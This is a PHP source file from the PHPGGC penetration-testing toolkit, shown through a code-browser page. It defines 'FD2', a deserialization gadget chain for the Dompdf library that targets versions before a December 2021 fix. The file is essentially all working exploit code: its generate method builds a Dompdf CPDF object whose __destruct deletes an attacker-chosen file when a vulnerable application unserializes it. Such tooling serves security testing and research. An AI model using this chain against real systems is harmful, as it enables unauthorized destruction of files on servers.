Codebase list phpggc / a0c45150-ee46-4d00-8416-0c7c72366661/upstream/0.20210218+git20221216.0.23e29e8 gadgetchains / Dompdf / FD / 2 / chain.php
a0c45150-ee46-4d00-8416-0c7c72366661/upstream/0.20210218+git20221216.0.23e29e8

Tree @a0c45150-ee46-4d00-8416-0c7c72366661/upstream/0.20210218+git20221216.0.23e29e8 (Download .tar.gz)

chain.php @a0c45150-ee46-4d00-8416-0c7c72366661/upstream/0.20210218+git20221216.0.23e29e8raw · history · blame

<?php

namespace GadgetChain\Dompdf;

class FD2 extends \PHPGGC\GadgetChain\FileDelete
{
    public static $version = '? < 1.1.1';
    public static $vector = '__destruct';
    public static $author = 'coiffeur';
    public static $information = '
        Note that some files may not be removed (depends on permissions)
        Target versions: exploitable < commit 61c86c04d2a483187ff9f6a73c50d42669be5b4d, 1 Dec 2021 (~v1.1.1)
    ';

    public function generate(array $parameters)
    {
        return new \Dompdf\Adapter\CPDF($parameters['remote_path']);
    }
}